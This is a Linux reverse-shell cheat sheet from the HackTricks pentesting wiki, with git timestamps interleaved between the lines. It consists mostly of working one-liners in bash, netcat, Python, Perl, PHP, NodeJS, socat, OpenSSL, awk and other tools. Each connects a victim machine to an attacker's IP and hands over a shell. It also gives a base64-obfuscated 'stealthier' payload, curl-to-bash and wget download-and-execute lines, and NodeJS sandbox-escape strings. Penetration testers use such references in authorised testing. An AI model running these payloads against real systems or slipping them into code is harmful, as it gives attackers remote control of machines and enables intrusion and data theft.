2022-05-11 14:59:34 +00:00
# Shells - Linux
2022-04-28 16:01:33 +00:00
< details >
< summary > < strong > Support HackTricks and get benefits!< / strong > < / summary >
Do you work in a **cybersecurity company** ? Do you want to see your **company advertised in HackTricks** ? or do you want to have access the **latest version of the PEASS or download HackTricks in PDF** ? Check the [**SUBSCRIPTION PLANS** ](https://github.com/sponsors/carlospolop )!
Discover [**The PEASS Family** ](https://opensea.io/collection/the-peass-family ), our collection of exclusive [**NFTs** ](https://opensea.io/collection/the-peass-family )
Get the [**official PEASS & HackTricks swag** ](https://peass.creator-spring.com )
**Join the** [**💬** ](https://emojipedia.org/speech-balloon/ ) [**Discord group** ](https://discord.gg/hRep4RUj7f ) or the [**telegram group** ](https://t.me/peass ) or **follow** me on **Twitter** [**🐦** ](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md )[**@carlospolopm** ](https://twitter.com/carlospolopm )**.**
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo** ](https://github.com/carlospolop/hacktricks )**.**
< / details >
2022-04-05 22:24:52 +00:00
**If you have questions about any of these shells you could check them with** [**https://explainshell.com/** ](https://explainshell.com )
2020-10-17 17:35:35 +00:00
2022-05-11 14:59:34 +00:00
## Full TTY
2020-08-19 11:54:25 +00:00
2021-11-30 16:46:07 +00:00
**Once you get a reverse shell**[ **read this page to obtain a full TTY** ](full-ttys.md)**.**
2020-08-19 11:54:25 +00:00
2022-05-11 14:59:34 +00:00
## Bash | sh
2020-07-15 15:43:14 +00:00
```bash
2022-05-11 14:59:34 +00:00
curl https://reverse-shell.sh/1.1.1.1:3000 | bash
2020-07-15 15:43:14 +00:00
bash -i >& /dev/tcp/< ATTACKER-IP > /< PORT > 0>& 1
2020-12-01 17:37:29 +00:00
sh -i >& /dev/udp/127.0.0.1/4242 0>& 1 #UDP
2020-07-15 15:43:14 +00:00
0< &196; exec 196< >/dev/tcp/< ATTACKER-IP > /< PORT > ; sh < & 196 >& 196 2>& 196
exec 5< >/dev/tcp/< ATTACKER-IP > /< PORT > ; while read line 0< &5; do $line 2>& 5 >&5; done
2021-03-30 08:00:11 +00:00
#Short and bypass (cretdits to Dikline)
2021-03-30 00:10:09 +00:00
(sh)0>/dev/tcp/10.10.10.10/9091
#after getting the previous shell, to get the output execute
exec >& 0
2020-07-15 15:43:14 +00:00
```
2020-12-01 17:37:29 +00:00
Don't forget to check with others shell : sh, ash, bsh, csh, ksh, zsh, pdksh, tcsh, bash
2022-05-11 14:59:34 +00:00
### Symbol safe shell
2020-11-15 22:04:11 +00:00
2020-07-15 15:43:14 +00:00
```bash
#If you need a more stable connection do:
2020-11-05 20:05:40 +00:00
bash -c 'bash -i >& /dev/tcp/< ATTACKER-IP > /< PORT > 0>& 1'
2020-07-15 15:43:14 +00:00
#Stealthier method
2020-11-05 20:05:40 +00:00
#B64 encode the shell like: echo "bash -c 'bash -i >& /dev/tcp/10.8.4.185/4444 0>&1'" | base64 -w0
2020-07-15 15:43:14 +00:00
echo bm9odXAgYmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xMC44LjQuMTg1LzQ0NDQgMD4mMScK | base64 -d | bash 2>/dev/null
```
2022-05-11 14:59:34 +00:00
### Create in file and execute
2020-11-15 22:04:11 +00:00
```bash
echo -e '#!/bin/bash\nbash -i >& /dev/tcp/1< ATTACKER-IP > /< PORT > 0>& 1' > /tmp/sh.sh; bash /tmp/sh.sh;
2020-11-15 22:28:16 +00:00
wget http://< IP attacker > /shell.sh -P /tmp; chmod +x /tmp/shell.sh; /tmp/shell.sh
2020-11-15 22:04:11 +00:00
```
2022-05-11 14:59:34 +00:00
## Forward Shell
2022-02-09 20:23:12 +00:00
You might find cases where you have a **RCE in a web app in a, Linux machine** but due to Iptables rules or other kind of filtering **you cannot get a reverse shell** . This "shell" allows you to maintain a PTY shell through that RCE using pipes inside the victim system.\
2022-04-05 22:24:52 +00:00
You can find the code in [**https://github.com/IppSec/forward-shell** ](https://github.com/IppSec/forward-shell )
2022-02-09 20:23:12 +00:00
You just need to modify:
* The URL of the vulnerable host
* The prefix and suffix of your payload (if any)
* The way the payload is sent (headers? data? extra info?)
Then, you can just **send commands** or even **use the `upgrade` command** to get a full PTY (note that pipes are read and written with an approximate 1.3s delay).
2022-05-11 14:59:34 +00:00
## Netcat
2020-07-15 15:43:14 +00:00
```bash
nc -e /bin/sh < ATTACKER-IP > < PORT >
nc < ATTACKER-IP > < PORT > | /bin/sh #Blind
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>& 1|nc < ATTACKER-IP > < PORT > >/tmp/f
nc < ATTACKER-IP > < PORT1 > | /bin/bash | nc < ATTACKER-IP > < PORT2 >
rm -f /tmp/bkpipe;mknod /tmp/bkpipe p;/bin/sh 0< /tmp/bkpipe | nc < ATTACKER-IP > < PORT > 1>/tmp/bkpipe
```
2022-05-11 14:59:34 +00:00
## Telnet
2020-07-15 15:43:14 +00:00
```bash
telnet < ATTACKER-IP > < PORT > | /bin/sh #Blind
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>& 1|telnet < ATTACKER-IP > < PORT > >/tmp/f
telnet < ATTACKER-IP > < PORT > | /bin/bash | telnet < ATTACKER-IP > < PORT >
rm -f /tmp/bkpipe;mknod /tmp/bkpipe p;/bin/sh 0< /tmp/bkpipe | telnet < ATTACKER-IP > < PORT > 1>/tmp/bkpipe
```
2022-05-11 14:59:34 +00:00
## Whois
2020-07-15 15:43:14 +00:00
**Attacker**
```bash
while true; do nc -l < port > ; done
```
2021-10-18 11:21:18 +00:00
To send the command write it down, press enter and press CTRL+D (to stop STDIN)
2020-07-15 15:43:14 +00:00
**Victim**
```bash
export X=Connected; while true; do X=`eval $(whois -h < IP > -p < Port > "Output: $X")`; sleep 1; done
```
2022-05-11 14:59:34 +00:00
## Python
2020-07-15 15:43:14 +00:00
```bash
#Linux
export RHOST="127.0.0.1";export RPORT=12345;python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")'
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
#IPv6
python -c 'import socket,subprocess,os,pty;s=socket.socket(socket.AF_INET6,socket.SOCK_STREAM);s.connect(("dead:beef:2::125c",4343,0,2));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=pty.spawn("/bin/sh");'
```
2022-05-11 14:59:34 +00:00
## Perl
2020-07-15 15:43:14 +00:00
```bash
perl -e 'use Socket;$i="< ATTACKER-IP > ";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S"); open(STDOUT,">&S"); open(STDERR,">&S"); exec("/bin/sh -i");};'
perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"[IPADDR]:[PORT]");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while< >;'
```
2022-05-11 14:59:34 +00:00
## Ruby
2020-07-15 15:43:14 +00:00
```bash
ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i < & %d >& %d 2>& %d",f,f,f)'
ruby -rsocket -e 'exit if fork;c=TCPSocket.new("[IPADDR]","[PORT]");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
```
2022-05-11 14:59:34 +00:00
## PHP
2020-07-15 15:43:14 +00:00
2022-07-01 18:36:12 +00:00
```php
// Using 'exec' is the most common method, but makes the assumption that the file descriptor will be 3.
// Using this method may lead to instances where the connection reaches out to the listener and then closes.
2020-07-15 15:43:14 +00:00
php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i < & 3 >& 3 2>&3"); '
2022-07-01 18:36:12 +00:00
// Using 'proc_open' makes no assumptions about what the file descriptor will be.
// See https://security.stackexchange.com/a/198944 for more information
<?php $sock=fsockopen("10.0.0.1",1234);$proc=proc_open("/bin/sh -i",array(0=>$sock, 1=>$sock, 2=>$sock), $pipes); ?>
2021-09-02 21:18:04 +00:00
<?php exec("/bin/bash -c 'bash -i >/dev/tcp/10.10.14.8/4444 0>&1'"); ?>
2020-07-15 15:43:14 +00:00
```
2022-05-11 14:59:34 +00:00
## Java
2020-07-15 15:43:14 +00:00
```bash
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5< >/dev/tcp/ATTACKING-IP/80;cat <& 5 | while read line; do \$line 2>& 5 >&5; done"] as String[])
p.waitFor()
```
2022-05-11 14:59:34 +00:00
## Ncat
2020-07-15 15:43:14 +00:00
```bash
victim> ncat --exec cmd.exe --allow 10.0.0.4 -vnl 4444 --ssl
attacker> ncat -v 10.0.0.22 4444 --ssl
```
2022-05-11 14:59:34 +00:00
## Golang
2020-07-15 15:43:14 +00:00
```bash
echo 'package main;import"os/exec";import"net";func main(){c,_:=net.Dial("tcp","192.168.0.134:8080");cmd:=exec.Command("/bin/sh");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;cmd.Run()}' > /tmp/t.go & & go run /tmp/t.go & & rm /tmp/t.go
```
2022-05-11 14:59:34 +00:00
## Lua
2020-07-15 15:43:14 +00:00
```bash
#Linux
lua -e "require('socket');require('os');t=socket.tcp();t:connect('10.0.0.1','1234');os.execute('/bin/sh -i < & 3 >& 3 2>&3'); "
#Windows & Linux
lua5.1 -e 'local host, port = "127.0.0.1", 4444 local socket = require("socket") local tcp = socket.tcp() local io = require("io") tcp:connect(host, port); while true do local cmd, status, partial = tcp:receive() local f = io.popen(cmd, 'r') local s = f:read("*a") f:close() tcp:send(s) if status == "closed" then break end end tcp:close()'
```
2022-05-11 14:59:34 +00:00
## NodeJS
2020-07-15 15:43:14 +00:00
```javascript
(function(){
var net = require("net"),
cp = require("child_process"),
sh = cp.spawn("/bin/sh", []);
var client = new net.Socket();
client.connect(8080, "10.17.26.64", function(){
client.pipe(sh.stdin);
sh.stdout.pipe(client);
sh.stderr.pipe(client);
});
return /a/; // Prevents the Node.js application form crashing
})();
or
require('child_process').exec('nc -e /bin/sh [IPADDR] [PORT]')
2021-11-08 23:40:13 +00:00
require('child_process').exec("bash -c 'bash -i >& /dev/tcp/10.10.14.2/6767 0>& 1'")
2020-07-15 15:43:14 +00:00
or
-var x = global.process.mainModule.require
-x('child_process').exec('nc [IPADDR] [PORT] -e /bin/bash')
or
2022-05-29 23:24:32 +00:00
// If you get to the constructor of a function you can define and execute another function inside a string
"".sub.constructor("console.log(global.process.mainModule.constructor._load(\"child_process\").execSync(\"id\").toString())")()
"".__proto__.constructor.constructor("console.log(global.process.mainModule.constructor._load(\"child_process\").execSync(\"id\").toString())")()
or
// Abuse this syntax to get a reverse shell
var fs = this.process.binding('fs');
var fs = process.binding('fs');
or
2020-07-15 15:43:14 +00:00
https://gitlab.com/0x4ndr3/blog/blob/master/JSgen/JSgen.py
```
2022-05-11 14:59:34 +00:00
## OpenSSH
2020-07-15 15:43:14 +00:00
2021-10-18 11:21:18 +00:00
Attacker (Kali)
2020-07-15 15:43:14 +00:00
```bash
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes #Generate certificate
openssl s_server -quiet -key key.pem -cert cert.pem -port < l_port > #Here you will be able to introduce the commands
openssl s_server -quiet -key key.pem -cert cert.pem -port < l_port2 > #Here yo will be able to get the response
```
Victim
```bash
#Linux
openssl s_client -quiet -connect < ATTACKER_IP > :< PORT1 > |/bin/bash|openssl s_client -quiet -connect < ATTACKER_IP > :< PORT2 >
#Windows
openssl.exe s_client -quiet -connect < ATTACKER_IP > :< PORT1 > |cmd.exe|openssl s_client -quiet -connect < ATTACKER_IP > :< PORT2 >
```
2022-05-11 14:59:34 +00:00
## **Socat**
2020-07-15 15:43:14 +00:00
[https://github.com/andrew-d/static-binaries ](https://github.com/andrew-d/static-binaries )
2022-05-11 14:59:34 +00:00
### Bind shell
2020-07-15 15:43:14 +00:00
```bash
victim> socat TCP-LISTEN:1337,reuseaddr,fork EXEC:bash,pty,stderr,setsid,sigint,sane
attacker> socat FILE:`tty`,raw,echo=0 TCP:< victim_ip > :1337
```
2022-05-11 14:59:34 +00:00
### Reverse shell
2020-07-15 15:43:14 +00:00
```bash
attacker> socat TCP-LISTEN:1337,reuseaddr FILE:`tty`,raw,echo=0
victim> socat TCP4:< attackers_ip > :1337 EXEC:bash,pty,stderr,setsid,sigint,sane
```
2022-05-11 14:59:34 +00:00
## Awk
2020-07-15 15:43:14 +00:00
```bash
awk 'BEGIN {s = "/inet/tcp/0/< IP > /< PORT > "; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null
```
2022-05-11 14:59:34 +00:00
## Finger
2020-07-15 15:43:14 +00:00
**Attacker**
```bash
while true; do nc -l 79; done
```
2021-10-18 11:21:18 +00:00
To send the command write it down, press enter and press CTRL+D (to stop STDIN)
2020-07-15 15:43:14 +00:00
**Victim**
```bash
export X=Connected; while true; do X=`eval $(finger "$X"@< IP > 2> /dev/null')`; sleep 1; done
export X=Connected; while true; do X=`eval $(finger "$X"@< IP > 2> /dev/null | grep '!'|sed 's/^!//')`; sleep 1; done
```
2022-05-11 14:59:34 +00:00
## Gawk
2020-07-15 15:43:14 +00:00
```bash
#!/usr/bin/gawk -f
BEGIN {
Port = 8080
Prompt = "bkd> "
Service = "/inet/tcp/" Port "/0/0"
while (1) {
do {
printf Prompt |& Service
Service |& getline cmd
if (cmd) {
while ((cmd |& getline) > 0)
print $0 |& Service
close(cmd)
}
} while (cmd != "exit")
close(Service)
}
}
```
2022-05-11 14:59:34 +00:00
## Xterm
2020-07-15 15:43:14 +00:00
2022-05-11 14:59:34 +00:00
One of the simplest forms of reverse shell is an xterm session. The following command should be run on the server. It will try to connect back to you (10.0.0.1) on TCP port 6001.
2020-07-15 15:43:14 +00:00
```bash
xterm -display 10.0.0.1:1
```
2022-05-11 14:59:34 +00:00
To catch the incoming xterm, start an X-Server (:1 – which listens on TCP port 6001). One way to do this is with Xnest (to be run on your system):
2020-07-15 15:43:14 +00:00
```bash
Xnest :1
```
2021-10-18 11:21:18 +00:00
You’ ll need to authorise the target to connect to you (command also run on your host):
2020-07-15 15:43:14 +00:00
```bash
xhost +targetip
```
2022-05-11 14:59:34 +00:00
## Groovy
2020-07-15 15:43:14 +00:00
by [frohoff ](https://gist.github.com/frohoff/fed1ffaab9b9beeb1c76 ) NOTE: Java reverse shell also work for Groovy
```bash
String host="localhost";
int port=8044;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
```
2022-05-11 14:59:34 +00:00
## Bibliography
2020-07-15 15:43:14 +00:00
{% embed url="https://highon.coffee/blog/reverse-shell-cheat-sheet/" %}
{% embed url="http://pentestmonkey.net/cheat-sheet/shells/reverse-shell" %}
{% embed url="https://tcm1911.github.io/posts/whois-and-finger-reverse-shell/" %}
{% embed url="https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md" %}
2022-04-28 16:01:33 +00:00
< details >
< summary > < strong > Support HackTricks and get benefits!< / strong > < / summary >
Do you work in a **cybersecurity company** ? Do you want to see your **company advertised in HackTricks** ? or do you want to have access the **latest version of the PEASS or download HackTricks in PDF** ? Check the [**SUBSCRIPTION PLANS** ](https://github.com/sponsors/carlospolop )!
Discover [**The PEASS Family** ](https://opensea.io/collection/the-peass-family ), our collection of exclusive [**NFTs** ](https://opensea.io/collection/the-peass-family )
Get the [**official PEASS & HackTricks swag** ](https://peass.creator-spring.com )
**Join the** [**💬** ](https://emojipedia.org/speech-balloon/ ) [**Discord group** ](https://discord.gg/hRep4RUj7f ) or the [**telegram group** ](https://t.me/peass ) or **follow** me on **Twitter** [**🐦** ](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md )[**@carlospolopm** ](https://twitter.com/carlospolopm )**.**
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo** ](https://github.com/carlospolop/hacktricks )**.**
< / details >